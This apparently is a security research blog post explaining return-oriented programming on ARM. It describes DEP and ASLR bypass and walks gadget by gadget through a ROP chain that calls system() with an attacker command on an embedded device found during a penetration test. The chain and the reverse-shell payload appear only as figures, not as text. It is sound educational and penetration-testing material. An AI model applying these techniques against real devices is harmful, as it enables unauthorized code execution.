ROP Chaining on ARM for Research Purposes

At Datto, information security is critical. Our information security teams focus on securing everything from customer portals to critical infrastructure devices. Sometimes this requires performing research on products we don't own but actively use. Networking devices are particularly important because they are considered single points of failure, where if one is compromised, an attacker now has a nice slew of hosts automatically connected ready to receive traffic from them. Oftentimes simple vulnerabilities can be easily identified in products with automated tooling; however, identification is not enough to accurately rate the risk related with a general vulnerability like a buffer overflow. Exploitation of said vulnerabilities must be done to realize the extent of a "bug". Most of the time, systems come with security features aimed at stopping attackers from being able to exploit common vulnerabilities. Two such technologies are DEP and ASLR.

Stack permissions with DEP enabled

DEP stands for Data Execution Prevention. This security feature allows the CPU to identify and label pieces of memory where code execution should NEVER happen (heap, stack). If instruction execution were to happen in these areas of memory the CPU will actually throw a fault signal and the program will end (crash).

In ARM processors DEP is referred as XN or XN bit, which stands for ‘execute never’ bit. Feel free to read up on what this is, but in essence it also restricts pieces of memory from executing instructions on the CPU.

But DEP is not all powerful and as always hackers have concocted creative and advanced techniques to bypass DEP. One such technique is ROP (Return Oriented Programming) chaining. ROP chaining is the act of ‘chaining’ (using in sequence) ROP ‘gadgets’ to create a desired program ‘flow’. ROP gadgets are simple pieces of code, oftentimes two or three assembly instructions, that end with a return statement. Executing these simple instructions does not trigger DEP because seeing as how they already exist in the exploited program, these pieces of memory already have execute permissions. Putting these small pieces of assembly together an attacker can execute instructions from multiple pieces of the current program to eventually perform their desired actions.

Memory stack with ASLR enabled

One method used to protect against ROP chaining is ASLR. ASLR works against ROP chaining by loading sections of memory in random address spaces every time the program is started. It could be that only the stack, heap, and loaded libraries are randomized, while the running process is static in memory everytime the program runs. This is depicted in the above figure.

In this case a ROP chain can still work if a viable ROP chain is found in a code module that is loaded without ASLR. If only ASLR is enabled and DEP is not, an attacker can circumvent ASLR by leaking a memory address which is always a fixed distance from their buffer to learn where in memory their malicious instructions are and jump to them. However, this requires having two vulnerabilities, one to leak a memory address, and another to perform the buffer overflow.

The best security practice is to load all components of a program with both ASLR and DEP enabled.

The Why

It is important to understand how to use ROP chaining to accurately rate found vulnerabilities by transitioning them from theoretically exploitable to actually exploited. There is a huge difference in risk when you say “I SHOULD be able to steal all your customers personal data”, compared with “I CAN steal all your customers personal data”.

Once a valid ROP chain has been identified, that chain will most likely be usable even if the original buffer overflow vulnerability has been patched. So you can call the same chain through a new vulnerability (new buffer overflow) that is identified later down the line. Pretty cool!

Additionally, understanding ARM ROP chaining is extremely useful for those interested in mobile and IOT device security research. Almost all mobile devices run ARM processors with DEP enabled. A ton of infrastructural devices such as routers, switches, access points use ARM or MIPs processors, and almost all ARM processors are transitioning to enabling DEP by default. Not to mention the tsunami of DIY IOT devices built with hobbyist single board computers like the raspberry pi and beaglebone which come ARM processors and DEP enabled.

So you found a buffer overflow...

Buffer overflow in memory

The first thing to do is understand which pieces of memory are randomized or static. Oftentimes the heap, stack, and linked libraries are put into random sections of memory while the main program you are working with and its various functions are not randomized. This has been observed to be the case in large multi-threaded programs (like the one I exploited to write this article). A ROP chain can likely be used to get code execution even with partial memory randomization.

Stack under various ASLR settings

To verify what pieces of code have ASLR enabled simply start the program with GDB and list the memory map with the following command.

info proc mapping

Do this a couple of times and note which memory regions vary and which ones stay the same. Additionally, a number of secondary tools like ‘gef’ can be used to automate this process.

Example GEF checksec command output

Understanding ARM Assembly...

The best tool of the trade for identifying gadgets is ROPGadgethttps://github.com/JonathanSalwan/ROPgadget, one because it is the most recommended, and two because the tool interface is simple to use. However, reverse engineering tools like GEF use a revamped version of ROPGadget called ropper.

ROPGadget example output

ROPGadget has an automated ROP chain generator for supported architectures. Unfortunately for us, this feature is currently not supported for the ARM cpu architecture (would be cool to lend a hand with that).

The first thing to iron out when creating ANY assembly code based payload is determining what you want your payload to do, for instance:

  • Reverse Shell
  • Bind Shell
  • Code Execution
    • Data loading/extraction/deletion
    • Account creation/modification

Next, it is important to have a basic understanding of how to write assembly code for your specific architecture. In this case we will be focusing on ARM assembly code. Some important ARM instructions are the following. A lot of this information has been referenced from Azeria Labs. Great tutorials and great place to start practicing these skills. https://azeria-labs.com/writing-arm-assembly-part-1/

Table of common ARM assembly instructions categorized by functionality


Now that we have a basic understanding of ARM assembly code we will try to create a ROP chain that allows us to pass a string, which resides in our payload, as a parameter to the system() function, which will ultimately result in system command execution.

Case Study

ROP chaining attack overview through stack

To help solidify some of the information given above, we will look at a ROP chain found during the penetration test of an embedded device here at Datto. A buffer overflow was found in a multi-threaded application running on the embedded device.

The vulnerable app had partial memory randomization because standard C libraries were loaded in memory segments at random start locations every time the application would run.

However, the main runtime app and its functions were static in memory every time. Additionally, the device had NX or DEP enabled which meant I would NOT be able to execute assembly instructions from within my overflow buffer.

With all this in mind our simple buffer overflow was a perfect opportunity to apply our knowledge of Return Oriented Programming. It is important to keep in mind that only the main applications code is static, so all ROP gadgets would have to be found within the main applications source code.

Output of checksec showing NX enabled

Here is an example ROP chain very similar to the one developed during my research. I know the size of this chain is daunting but we will break down the entire chain together. Let’s say [line a] overwrites the original ‘PC’ so the first return address will be [line a].

Example ROP chain with accompanying ARM assembly


As mentioned before, we want to make a syscall to system() with our custom command string. First thing to do is to identify what functions call ‘system()’. It turns out that in the program being tested only 1 occurrence of a call to ‘system()’ is done and unfortunately the address contains a null byte.

Representation of string in memory

In this case the data being placed in the overflowed buffer came from a remote user. Reverse engineering the program with Ghidra showed that the user supplied data was copied into the vulnerable buffer using strcpy(). strcpy() copies all data from the start of a string pointer up until it hits a null byte. Thus, our payload can only contain a single null byte at the end of it, or else any null byte in the middle will tell strcpy() that it has reached the end of the data to be copied, when it fact it hasn’t, and the rest of our payload will be thrown away.

Good and bad strcpy() functions in C

So jumping to that memory address MUST be the last thing in our payload because everything after that null byte will not be copied to our overflown buffer [line s].

Next we must somehow pass our custom cmd string to register r0 so that it can be passed to the system() function as a parameter. The string will be added right before the address that calls system(), in our payload buffer. As mentioned before our string can not contain any null bytes because it is NOT the last thing in our payload, the address which calls system() is. So, we will need to use the ‘strb’ ARM assembly instruction to place a null byte at a specific location in our custom cmd string. In this case the ONLY ROP gadget that contained a useful strb assembly instruction was [line m] of the final payload. This instruction will get the string being pointed to by r1 and place the value of r3 at index 0x18 or 24 in decimal. This leads us to our next challenge of first needing to set the value of r3 to 0!

To set r3 to 0, again, the only ROP gadget found in this binary was [line d]. Unfortunately, this ROP gadget not only sets r3 to the value of r0, but also adds 0x70 to the current stack pointer, and also pops r4, r5, r6 and pc from the stack. To fix these additional instructions a buffer must be placed of 112 characters to account for the 0x70 sp offset, then values for r4, r5, r6, and pc must be given so that real instructions are not given to the registers instead of being executed.

So the next step here is to get r0 to be 0. The good news is that there were a ton of instructions that accomplished this. For simplicity I chose the instruction on [line c]. However, this instruction has a ‘bx lr’ which means I must first override the register ‘lr’ with a ‘pop {pc}’ instruction. This way when ‘bx lr’ gets executed the instruction that actually gets executed is ‘pop {pc}’. This will eat the next instruction from our buffer and execute that. This can be accomplished with a simple gadget ‘pop {lr}’. This is seen in [line a] and [line b].

Taking it from the top!

To summarize lets review the code from top to bottom. We start by over writing lr to use later when we overwrite r0 to 0.

Taking control of the stack and setting up registers

Then with r0 set to 0 we set r3 to r0 and add a small buffer to account for our sp += 0x70. We also provide some values for r4, r5, and r6 that will be useful later.

Zeroing important registers and dealing with secondary instructions

Now that r3 is set to zero we are ready to overwrite the end of our string. Before we can do this, we need to set a register to the start of our string. [Line j] gets the current sp and sets r1 = sp + 0x18 or 24 bytes away. This means our cmd string needs to start 24 bytes from the current stack pointer. THIS OFFSET IS VERY IMPORTANT. IF THIS IS NOT EXACT THE PAYLOAD WILL NOT WORK!

Setting r1 to point to the memory location of the start of our command string



Taking this into account we only have 6 ROP gadgets before we need to start the cmd string. So we need to add the null byte to the string, and then transfer the address in r1 to r0 before we finally call system(). This is accomplished in [lines k - q]. It is important to note that the null byte will be placed 24 chars from the start of the string so our cmd string only has 24 useful bytes. Additionally, we need to set the pc to the system() call which is after the string, which as of right now is 24 bytes away. Thus we need to pop (24/4) words or 6 registers. But we have to be careful and NOT overwrite r0.

Adding null byte to the end of the command string and dealing with secondary instructions



The only ROP gadget that pops more than 6 registers is [line q]. But [line q] actually pops 7 registers before popping pc and our cmd string is only 6 registers long. So what we will do is extend our cmd string to 24 + 4 bytes. 4 extra bytes for that 7th register. However, still only the first 24 bytes are passed to system(). An example payload is given for a reverse shell.

Transferring program execution to system() function and dealing with secondary instructions



Finally, the ‘pc’ is set to the memory address that calls system(), and our 24 byte command will be executed!

Wrapping it all up

Hopefully you’ve gained a basic understanding of what a buffer overflow is, and what mitigation there are out there to help you protect against them. Additionally, we discussed what a ROP gadget is fundamentally, and how you can use these primitive elements to construct ROP chains. A table of useful ARM assembly instructions was also given that can be used later to create even more complex ROP chain logic. Lastly, a small example of how to work with difficult ARM assembly instructions was studied. This showcased how to deal with unwanted secondary instructions in useful ROP gadgets. Ultimately, being able to work with difficult ROP gadgets has strengthened your ability to successfully exploit an ARM binary.

Use the force for good.

  • Armed with this knowledge buffer overflows can safely become code execution even on security hardened embedded or mobile systems.
  • Additionally, better understanding ROP gadgets and how to chain them will allow you to create more robust ROP chains. Being able to work with difficult gadgets also allows for more robust ROP chaining.
  • Remember ROP chaining requires you to ‘live off the land’ so you can only do as much as what is already given by the program. As always go for the low hanging fruit like simple system() calls.

References

About the Author

Felix Blanco

Breaking and rebuilding cloud managed embedded systems.

More from this author